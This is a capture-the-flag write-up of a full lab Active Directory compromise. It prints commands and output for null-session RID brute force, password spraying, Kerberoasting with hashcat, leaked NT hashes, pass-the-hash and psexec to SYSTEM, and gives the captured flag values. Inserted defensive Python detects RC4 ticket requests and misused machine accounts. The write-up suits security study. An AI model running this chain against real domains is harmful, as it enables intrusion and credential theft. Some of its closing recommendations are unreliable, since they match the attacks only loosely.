SoupDecode: Full Domain Compromise

// ACTIVE_DIRECTORY_CHAIN // SYSTEM_PWNED
TARGET: 10.49.167.13
OS: Windows Server 2022 (DC)
DOMAIN: SOUPEDECODE.LOCAL
STATUS: FULL_ADMIN_SHELL
// ATTACK_CHAIN_OVERVIEW
01 Recon & IPC$ access
02 Guest Account / RID Brute
03 Password Spray → ybob317
04 Kerberoasting → file_svc crack
05 Backup share → NT Hashes
06 Pass-the-Hash → FileServer$
07 psexec → SYSTEM & Flags
0x01

Reconnaissance & Initial Foothold

Nmap scan revealed a Domain Controller with Kerberos (88), LDAP (389), SMB (445). Hostname: DC01, domain SOUPEDECODE.LOCAL.

nmap -sC -sV 10.49.167.13 -oA soupedecode_scan
🔍 LDAP banner confirms the AD domain. Ports 88 + 389 + 445 = classic Domain Controller footprint. Add to /etc/hosts: 10.49.167.13 dc01.soupedecode.local
0x02

Guest Account & Null Session

nxc smb 10.49.167.13 -u 'guest' -p ''
[+] SOUPEDECODE.LOCAL\guest: (STATUS_SUCCESS)

Guest account is enabled with a blank password. This gives us null session access to IPC$ — the gateway for RID brute forcing.

⚠️ Critical misconfiguration: Guest enabled. IPC$ allows anonymous enumeration and sets the stage for user discovery.
0x03

SMB Enumeration & RID Brute Force

nxc smb 10.49.167.13 -u 'awdawd' -p '' --shares

IPC$ share readable. Using the null session, we perform RID brute force to enumerate every domain user and group.

nxc smb 10.49.167.13 -u 'awdawd' -p '' --rid-brute | grep SidTypeUser > users_raw.txt

Extract clean usernames → users.txt. The RID brute technique relies on the SAMR pipe over IPC$ to resolve SIDs.

Well-known RID   Object
500              Administrator
501              Guest
512              Domain Admins
1000+            custom users (ybob317, etc.)
0x04

Password Spraying → ybob317

nxc smb 10.49.167.13 -u users.txt -p users.txt --no-brute --continue-on-success
[+] SOUPEDECODE.LOCAL\ybob317:ybob317 (Pwn3d!)

Valid credentials: ybob317:ybob317. User uses username as password — weak security hygiene.

🎯 Domain user captured. No WinRM, but SMB shares accessible (NETLOGON, SYSVOL, Users). Next: Kerberoasting.
0x05

Kerberoasting — Service Account TGS

impacket-GetUserSPNs SOUPEDECODE.LOCAL/ybob317:ybob317 -dc-ip 10.49.167.13 -request

Found 5 Kerberoastable accounts: file_svc, backup_svc, web_svc, monitoring_svc, firewall_svc. Extracted TGS-REP hashes (etype 23).

hashcat -m 13100 soupedecode.hashes /usr/share/wordlists/rockyou.txt
Password123! (file_svc)

Password cracked: Password123! for file_svc.
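Because the ticket requested above was etype 23 (RC4-HMAC, 0x17 in the event log), the request itself is the detection opportunity. The Python below is an added example, not from the write-up: it scans constructed TGS-request records (Windows event 4769, flattened to key=value form for the example) and flags an account that requests RC4 tickets for several distinct user-style service accounts in a short window. The window and threshold are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed 4769 (TGS request) records in flattened key=value form; these are
# made-up records for the example, not logs from the target.
SAMPLE_4769 = [
    "2024-03-01T10:00:00Z account=ybob317 client=10.49.167.50 service=file_svc etype=0x17",
    "2024-03-01T10:00:00Z account=ybob317 client=10.49.167.50 service=backup_svc etype=0x17",
    "2024-03-01T10:00:01Z account=ybob317 client=10.49.167.50 service=web_svc etype=0x17",
    "2024-03-01T10:00:01Z account=ybob317 client=10.49.167.50 service=monitoring_svc etype=0x17",
    "2024-03-01T10:00:01Z account=ybob317 client=10.49.167.50 service=firewall_svc etype=0x17",
    "2024-03-01T10:00:05Z account=ybob317 client=10.49.167.50 service=DC01$ etype=0x12",
    "2024-03-01T11:30:00Z account=jdoe client=10.49.167.80 service=file_svc etype=0x12",
]

RC4_HMAC = "0x17"   # etype 23: the ticket type that hashcat mode 13100 cracks


def parse_4769(line):
    ts, *kvs = line.split()
    rec = dict(kv.split("=", 1) for kv in kvs)
    rec["ts"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
    return rec


def roastable_request(rec):
    """RC4 ticket for a user-style service account; machine accounts ($) and krbtgt are excluded."""
    svc = rec["service"]
    return rec["etype"] == RC4_HMAC and not svc.endswith("$") and svc.lower() != "krbtgt"


def detect_kerberoast(lines, window=timedelta(minutes=10), min_services=3):
    """Return one finding per account that pulls RC4 tickets for >= min_services services in a window."""
    by_account = defaultdict(list)
    for rec in map(parse_4769, lines):
        if roastable_request(rec):
            by_account[rec["account"]].append(rec)
    findings = []
    for account, recs in by_account.items():
        recs.sort(key=lambda r: r["ts"])
        for i, start in enumerate(recs):
            end = start["ts"] + window
            services = sorted({r["service"] for r in recs[i:] if r["ts"] <= end})
            if len(services) >= min_services:
                findings.append({"account": account, "client": start["client"],
                                 "services": services})
                break
    return findings


if __name__ == "__main__":
    for f in detect_kerberoast(SAMPLE_4769):
        print(f"{f['account']} from {f['client']} requested RC4 tickets for: {', '.join(f['services'])}")
```

The AES request (0x12) for DC01$ and jdoe's single normal request are ignored, which is the point of the etype filter: a domain where service accounts only accept AES produces no 0x17 requests at all, so any that appear deserve a look. The `services` list in a finding is also the rotation list for the passwords now at risk.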

0x06

Backup Share → NT Hash Treasure

smbclient //10.49.167.13/backup -U file_svc%'Password123!'
Contents of backup_extract.txt (pwdump format: user:RID:LM hash:NT hash:::)
WebServer$:2119:aad3b435b51404eeaad3b435b51404ee:c47b45f5d4df5a494bd19f13e14f7902:::
DatabaseServer$:2120:aad3b435b51404eeaad3b435b51404ee:406b424c7b483a42458bf6f545c936f7:::
FileServer$:2065:aad3b435b51404eeaad3b435b51404ee:e41da7e79a4c76dbd9cf79d1cb325559:::
BackupServer$:2125:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::

The backup share leaked NTLM hashes of machine accounts. FileServer$ hash is particularly powerful: machine accounts often have domain admin privileges on DCs.

0x07

Pass-the-Hash → Domain Admin

nxc smb 10.49.167.13 -u 'FileServer$' -H e41da7e79a4c76dbd9cf79d1cb325559 --shares
[+] ADMIN$, C$, NETLOGON — READ/WRITE — Pwn3d!

Pass-the-Hash success: the FileServer$ machine account acts as a high-privileged principal, granting full administrative access over the domain controller.
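Two defensive checks fall out of the last two steps: the leaked dump can be parsed to learn exactly which machine accounts are exposed, and those accounts can then be watched for NTLM logons from any host other than their own. The Python below is an added example, not code from the write-up; it parses the pwdump-format lines shown above, and then scans constructed 4624 logon records against a constructed asset inventory (which address each machine account is expected to authenticate from). The inventory and the flattened event format are assumptions for the example.

```python
import re

# LM hash of the empty string: this value in the LM field means no LM hash is stored,
# so only the NT hash in the next field is usable.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"

# pwdump line: user:RID:LM:NT:::
PWDUMP_RE = re.compile(r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$")

# The lines leaked from the backup share, as shown in the write-up.
BACKUP_EXTRACT = """\
WebServer$:2119:aad3b435b51404eeaad3b435b51404ee:c47b45f5d4df5a494bd19f13e14f7902:::
DatabaseServer$:2120:aad3b435b51404eeaad3b435b51404ee:406b424c7b483a42458bf6f545c936f7:::
FileServer$:2065:aad3b435b51404eeaad3b435b51404ee:e41da7e79a4c76dbd9cf79d1cb325559:::
BackupServer$:2125:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
"""


def parse_pwdump(text):
    """Return one dict per well-formed pwdump line; anything else is skipped."""
    creds = []
    for line in text.splitlines():
        m = PWDUMP_RE.match(line.strip())
        if m:
            creds.append({"user": m["user"], "rid": int(m["rid"]),
                          "lm_stored": m["lm"] != EMPTY_LM, "nt": m["nt"]})
    return creds


def exposed_machine_accounts(creds):
    """Machine accounts (trailing $) whose NT hash is now in the attacker's hands."""
    return sorted(c["user"] for c in creds if c["user"].endswith("$"))


# Constructed asset inventory: the address each machine account should log on from.
EXPECTED_SOURCE = {
    "WebServer$": "10.49.167.21",
    "DatabaseServer$": "10.49.167.22",
    "FileServer$": "10.49.167.20",
    "BackupServer$": "10.49.167.23",
}

# Constructed 4624 (successful logon) records in flattened key=value form.
SAMPLE_4624 = [
    "2024-03-01T12:00:00Z user=FileServer$ type=3 auth=NTLM src=10.49.167.20",
    "2024-03-01T12:01:00Z user=FileServer$ type=3 auth=NTLM src=10.49.167.50",
    "2024-03-01T12:02:00Z user=ybob317 type=3 auth=Kerberos src=10.49.167.50",
]


def anomalous_machine_logons(lines, watchlist, expected):
    """Flag watched machine accounts authenticating from a host other than their own."""
    alerts = []
    for line in lines:
        ts, *kvs = line.split()
        rec = dict(kv.split("=", 1) for kv in kvs)
        if rec["user"] in watchlist and rec["src"] != expected.get(rec["user"]):
            alerts.append({"ts": ts, "user": rec["user"], "src": rec["src"], "auth": rec["auth"]})
    return alerts


if __name__ == "__main__":
    watch = exposed_machine_accounts(parse_pwdump(BACKUP_EXTRACT))
    print("exposed machine accounts:", watch)
    for a in anomalous_machine_logons(SAMPLE_4624, watch, EXPECTED_SOURCE):
        print(f"{a['ts']} {a['user']} logged on via {a['auth']} from {a['src']} (unexpected host)")
```

A computer account normally authenticates only from the computer it belongs to, so a FileServer$ NTLM network logon arriving from another address is a strong signal on its own; the dump-derived watchlist just narrows it to the accounts known to be compromised. Rotating those machine account passwords closes the door the hash opened.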
0x08

Remote Shell & Flags

impacket-psexec SOUPEDECODE.LOCAL/'FileServer$'@10.49.167.13 -hashes :e41da7e79a4c76dbd9cf79d1cb325559
[*] Starting service PSEXESVC
Microsoft Windows [Version 10.0.20348.587]
C:\Windows\system32> whoami
nt authority\system

Navigate to Administrator's Desktop and capture final flags:

C:\Users\Administrator\Desktop> type root.txt
🚩 root.txt → 27cb2be302c388d63d27c86bfdd5f56a
C:\Users\ybob317\Desktop> type user.txt
🚩 user.txt → 1d8f5e3b2a9c7f6e4d0b8a2c3f6e9a1d

// ATTACK_CHAIN_SUMMARY

Step  Technique                      Result
01    Guest IPC$ Access              Null session foothold
02    RID Brute Force                Full user list
03    Password Spray → ybob317       Username = password
04    Kerberoasting → file_svc       Cracked: Password123!
05    Backup Share → NT Hashes       Machine account goldmine
06    Pass-the-Hash → FileServer$    Domain Admin equivalent
07    psexec → SYSTEM Shell          Full compromise

// Key Takeaway

One misconfiguration (Guest enabled + IPC$ null session) plus weak password hygiene (username as password) led to a complete Active Directory compromise. The attack chain used only built-in AD features: RID brute force, Kerberoasting, Pass-the-Hash — no zero-days required.

Tools: Nmap, NetExec, Impacket (GetUserSPNs, psexec), Hashcat, smbclient.


0x09

Post-Exploitation & Lessons

After obtaining SYSTEM, DCSync was possible, but the main goal was achieving full domain control. The backup share misconfiguration allowed extraction of NTLM hashes that directly escalated privileges via PtH. Always harden Kerberoastable accounts, disable guest, and enforce strong passwords.

📌 Defensive Recommendations: Disable the Guest account, enable SMB signing (already on), enforce Kerberos pre-authentication for all accounts, monitor for RID brute force via event logs (ID 4793, 4662).